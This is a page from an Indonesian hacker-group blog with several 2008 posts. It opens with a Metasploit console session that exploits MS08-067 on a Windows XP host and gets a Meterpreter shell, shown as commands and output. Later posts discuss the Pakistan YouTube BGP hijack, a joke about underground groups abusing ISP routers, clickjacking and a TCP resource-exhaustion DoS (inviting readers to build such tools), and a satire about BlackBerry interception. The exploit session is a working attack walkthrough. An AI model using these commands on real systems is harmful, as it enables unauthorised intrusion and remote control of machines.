Kecoak Elektronik Indonesia

msf > version
Framework: 3.2-testing.5773
Console  : 3.2-testing.5773

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi

Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5803
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)

Provided by:
hdm 

Available targets:
Id  Name
--  ----
0   Windows XP SP2 English (DEP)
1   Windows XP SP3 English (DEP)
2   Windows 2003 SP0 English (NO DEP)
3   Windows 2003 SP2 English (NO DEP)

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 7 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing DEP on some operating systems and service
packs. The correct target must be used to prevent the Server Service
(along with a dozen others in the same process) from crashing.
Windows XP targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full
support for DEP bypass on 2003, along with other platforms, is still
in development.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

msf exploit(ms08_067_netapi) > set RHOST 192.168.132.130
RHOST => 192.168.132.130

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target...
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)

meterpreter > sysinfo
Computer: Research-1
OS      : Windows XP (Build 2600, Service Pack 2).

Lagi-lagi netbios menjadi pintu masuk Microsoft Windows. Mungkin sudah saatnya pemberi tutorial melupakan RPC DCOM holes untuk contoh menembus Microsoft Windows via Metasploit.

I think everyone love 2008…

Mark Shuttleworth bersama team-nya, hari ini resmi merilis versi terbaru dari Ubuntu yang bertajuk “Interpid Ibex”. Tidak banyak perubahan dari versi sebelumnya, malahan banyak ubuntu user yang tidak mau meng-upgrade ubuntunya, hal ini dikarenakan di versi sebelumnya mendukung Long Time Support. Namun, tidak ada salahnya jika anda ingin mencoba varian ubuntu terbaru ini. To download this version, visit here. To see the feature of this version, visit here or here.

1. Pakistan bermaksud mem-block salah satu content video pada youtube yang dinilai mendiskreditkan islam

2. Pakistan melalui salah satu ISP terbesar-nya melakukan proses blocking dengan memanfaatkan kapasitas ISP tersebut untuk memainkan proses routing protokol BGP agar request dari rakyat pakistan ke youtube.com diarahkan kembali kedalam network pakistan

3. (Agar tidak perlu bersusah payah || kesalahan engineer ISP || sang engineer memahami protokol BGP dengan baik yang akan memberikan efek pada AS router ISP lain) berhasil memblock request dari rakyat pakistan yang hendak meng-akses situs youtube. Bagaimana caranya? Cukup memberikan advertisement via router BGP untuk youtube.com terhadap AS disekitarnya yang menyatakan ‘apabila ada request ke youtube.com harap diarahkan kepada kami’, secara teknikal ini dapat dilakukan dengan memberikan advertisement berupa ‘prefixes’ yang lebih kecil untuk routing menuju youtube.com

4. Selang beberapa saat setelah itu, akses ke youtube.com outage selama 2 jam. Hasil investigasi menyatakan paket data dari tempat-tempat diberbagai belahan dunia ‘blackout’ di network pakistan.

5. Insiden ini mebuahkan investigasi dan pada akhirnya public-disclosure secara meluas (yang semula hanya diketahui beberapa pihak) mengenai bugs pada protokol BGP. Tingkah laku BGP ini telah menjadi hasil riset berbagai pihak sejak awal-awal kemunculannya termasuk close-disclosure yang dilakukan oleh old-skewl hacker kepada pihak inteligent mengenai bagaimana memanfaatkan bugs ini untuk mengawasi trafik internet dunia 10 tahun yang lalu.

6. Berbeda dengan bugs DNS dimana proses mass-patch dapat dilakukan, untuk masalah ini jauh lebih sulit untuk melakukan patch, dan mungkin baru akan benar-benar aman setelah berbulan-bulan / tahunan. Setiap pihak yang memiliki akses ke BGP router dapat melakukan man-in-the-middle attack ini. Jika traffic bisa diarahkan untuk eavesdropping, mungkin donk untuk melakukan dos?

7. Beberapa sumber juga menyatakan home router yang memiliki kemampuan BGP juga dapat dimanfaatkan untuk melakukan abuse.

8. Banyak group-group underground Indonesia yang mampu mendapatkan akses suatu router ISP, dan sudah hal klasik router ISP tersebut menjadi mainan anak-anak. Mungkin dengan adanya public disclosure seperti ini, kalangan underground bisa membantu pemerintah menerapkan RUU Anti Pornografi secara langsung dan teknikal tanpa perlu tetek bengek rapat-rapat berbau politik dan menghasilkan UUD (Ujung-Ujungnya Duid).

9. Please don’t take seriously point #8 above. Tentu saja pemerintah memiliki kemampuan jika memang ada kemauan untuk melakukan blocking terhadap situs-situs pornografi. Terutama dengan adanya proses monitoring dari ID-SIRTII tercinta (small and easy step from monitoring to blocking, isn’t it?).

Sumber: http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html

Masih ingat dengan full-disclosure media hype Month Of Browser Bugs yang dimotori oleh HDM bulan juli 2006?!beberapa bulan setelah itu para fans full-disclosure media hype ikut-ikut an metode HDM dan menyelenggarakan ‘Month Of Something Bugs’ mereka masing-masing. Ada yang apple lah, ada yang kernel, dll.

Tahun 2008 sepertinya masa keemasan metode ‘partial-disclosure media hype’ oleh para researcher security, khususnya yang berasal dari USA. Dan kali ini mengikuti metode Dan Kaminsky, menunda full-disclosure dengan terlebih dahulu melakukan partial-disclosure yang memanfaatkan media hype. Hasilnya?! sebagian membuat masyarakat penasaran dan sebagian lain membuat masyarakat ketakutan karena tipe bugs-nya masih misterius.

Trik bisnis kah?! atau trik popularitas?! Don’t care. Yang pasti, tipe bugs-nya termasuk menarik untuk dibahas.

Dua jenis bugs yang mengikuti metode partial-disclsoure media hype Dan Kaminsky, dan keduanya sedang hangat dibahas saat ini. Yang pertama datang dari bidang webhacking, dan yang kedua datang dari bidang system hacking. Dan seperti biasa, keduanya ikut disulut dari salah satu mailing list tempat para researcher-researcher cerdas di bidang security berkumpul, Daily Dave mailing list.

Isu pertama datang dari kawasan webhacking mengenai “clickjacking”. Jeremiah Grossman dan Rsnake menunda full-disclosure mereka tentang clickjacking pada event OWASP ‘08 dan menggantinya dengan sesi ‘ClickJacking 20-Questions’. Hal ini membuat masyarakat kembali dalam status ’spekulasi’ mengenai bugs tersebut, karena Jeremiah dan Rsnake hanya memberikan penjelasan singkat tentang bugs tersebut. Hal ini mirip ketika Dan Kaminsky melakukan partial disclosure terhadap masyarakat dengan bugs DNS cache nya. Banyak pihak membicarakan mengenai clickjacking ini, diantaranya Giorgio Maone, Dave Aitel, hingga BeakingPoint Labs. Kita juga dapat melihat salah satu contoh spekulasi tersebut. Michal Zalewski juga ikut menjelaskan mengenai kemungkinan bugs ini serta memberikan solusi atas permasalahan tersebut. Media hyped semakin ramai dengan salah satu isi blog adobe mengenai clickjacking yang juga memberikan efek pada produk adobe.

Diantara semua, email penjelasan dari Michal Zalewski termasuk yang membuat media semakin heboh. Terutama karena salah satu solusi yang di-propose oleh dia untuk menangani masalah ini adalah ‘Rework everything we know about HTML / browser security models’. Well, at least semua researcher tersebut setuju bahwa kombinasi Mozilla Firefox + NoScript dapat mencegah user terkena efek serangan tersebut. Tapi seperti biasa, bugs ini rasanya tetap menarik untuk diikuti terutama jika mempengaruhi produk selain web browser.

Kandidat kedua untuk fans Dan’s Kaminksy partial-disclosure scenario adalah “New TCP Resource Exhaustion DOS (Denial of Service) Attack”. Fyodor (Nmap creator) baru saja hari ini menulis pada (again) mailing list Daily Dave mengenai spekulasinya terhadap jenis serangan Dos yang dikatakan ‘baru’ oleh Robert Lee dan Jack Louis. Berdasarkan keterangan Fyodor, basic jenis serangan tersebut sama sekali bukan jenis baru karena dia sudah meng-implementasikan nya pada tools Ndos beberapa tahun yang lalu namun tidak merilis tools tersebut, hanya menuliskan pada salah satu buku yang (bagian fyodor) juga di-buat free untuk dibaca secara online. I love fyodor .

Inti dari ‘New’ Dos tersebut terletak pada TCP Resource Exhaustion. Silahkan baca dengan cermat penjelasan Fyodor. Pada penjelasan tersebut kita dapat melihat bagaimana resource suatu sistem yang menggunakan protokol TCP/IP dapat dihabiskan. Sistem akan mengalokasikan beberapa resource-nya untuk menangani protokol TCP/IP dan penjelasan Fyodor diatas memperlihatkan bagaimana caranya menghabiskan resource tersebut secara cerdik.

Spekulasi tetaplah spekulasi, bisa jadi benar seperti yang terjadi pada bugs dns dan kaminsky, bisa jadi sebagian benar dalam arti memiliki pondasi yang mirip dengan spekulasi-spekulasi tersebut namun ’sang penemu’ memiliki cara lain untuk meng-extend bugs tersebut, bisa jadi completely false! Dalam arti, spekulasi orang-orang diseluruh dunia salah dan sang penemu merupakan orang jenius yang mampu menemukan bugs tersebut sendirian tanpa bisa disamai oleh researcher manapun.

Setelah membaca penjelasan Fyodor mengenai tehnik Ndos, mungkin ada yang bersedia menghabiskan waktunya untuk develop tools tersebut?! mungkin bisa menjadi alternative lain selain menggunakan mekanisme tembak.c secara distribusi .

As always, media hype security circus is interesting. Hm, break time is over (sambil makan buah terakhir), put back my butt to daily job..

Cukup untuk membuat kita tertawa membaca berita tersebut. Bapak direktur marketing ini memang sangat cerdas dan sangat memahami customer dengan baik, dengan memperhatikan pangsa pasar dimana para koruptor berkeliaran dan memahami kekuatiran mereka pasca korban kasus BLBI yang di-busted dengan metode cracking (baca: sadap) oleh pemerintah, kehadiran suatu produk yang dapat mengamankan privasi para potensial customer (baca: koruptor) tersebut akan sangat menguntungkan.

SMS memang sangat mudah dibaca, fresh graduate maupun anak SD yang kebetulan ikut masuk ke ruangan SMS center perusahaan telekomunikasi dapat membaca sms siapapun dari operator manapun. Pagar pengaman hanya masalah ‘kode etik’.

Seorang marketer yang baik, harus mampu melepaskan statement ambigu namun jujur. Sehingga jika ada yang complain, fakta kejujuran adalah jawaban yang tidak bisa dibantah lagi. Contoh nya: “Komunikasi bakal lebih aman karena BlackBerry memiliki teknologi enkripsi yang berbeda dengan perangkat ponsel pintar lainnya. Orang kebanyakan nyari BlackBerry karena lebih secure khususnya untuk chatting”.

2 minggu kemudian, salah satu potensial customer (red: cari arti potensial customer diatas) menulis pada kolom surat pembaca dari salah satu pojok ruangan KPK menyatakan bahwa klaim BlackBerry terbaru masih tidak aman. Terbukti ketika dia membicarakan suatu hal ‘privasi’ melalui ponsel, suaranya masih dapat ditangkap oleh perangkat KPK.

Tidak berapa lama akan muncul balasan dari pihak exelcomindo, “Maaf pak, yang kami maksud dengan lebih secure untuk layanan data seperti pesan singkat. Pada BlackBerry sekarang terdapat mekanisme PIN khusus yang terdiri dari deretan hexadecimal untuk keperluan enkripsi, dan PIN setiap device sifatnya unik. Dengan aplikasi chatting yang memanfaatkan fasilitas PIN tersebut, maka pesan dari suatu perangkat BlackBerry ke perangkat BlackBerry lainnya yang juga mendukung fasilitas tersebut akan jauh lebih aman. Hal ini mirip seperti private/public key encryption pada SSH/SSL (red: dengan harapan sang potensial customer mengerti tentang SSH/SSL). Walaupun pesan tersebut melewati network serta BlackBerry Enterprise Server (BES) sebagai relay, namun tetap jauh lebih aman dengan mekanisme PIN ini. Sedangkan untuk komunikasi Voice masih tetap melalui jalur GSM umum.”

Selama komunikasi voice masih memanfaatkan BTS (2G) ataupun Node-B (3G), dan masih melewati core network suatu operator yang telah terpasang law interception technology, penyadapan masih sangat mungkin untuk dilakukan. Namun jika ternyata KPK hanya menggunakan penyadapan berbasis radio, mungkin menggunakan network 3G (UMTS/HSDPA) akan lebih aman dibandingkan menggunakan network 2G. Karena metode enkripsi 3G memang lebih baik dibandingkan 2G.

Well, just a joke on Sunday Morning. Reading with a cup of tea would be nice. Please not to take it too seriously .

Beberapa negara Timur Tengah dan Eropa telah melaksanakan Idul Fitri pada 30 September 2008. Sedangkan di Indonesia dan beberapa negara lain dikabarkan 1 syawal akan jatuh pada tanggal 1 Oktober 2008. Walaupun ada beberapa perbedaan disini, itu tidak menjadi masalah untuk Kecoak Elektronik Indonesia mengucapkan Selamat Hari Raya Idul Fitri 1429 H, Minal Aidzin Wal Faidzin, Mohon Maaf Lahir dan Bathin, jika selama ini ada kesalahan dari kami, sekiranya kami mengucapkan maaf yang sebesar-besarnya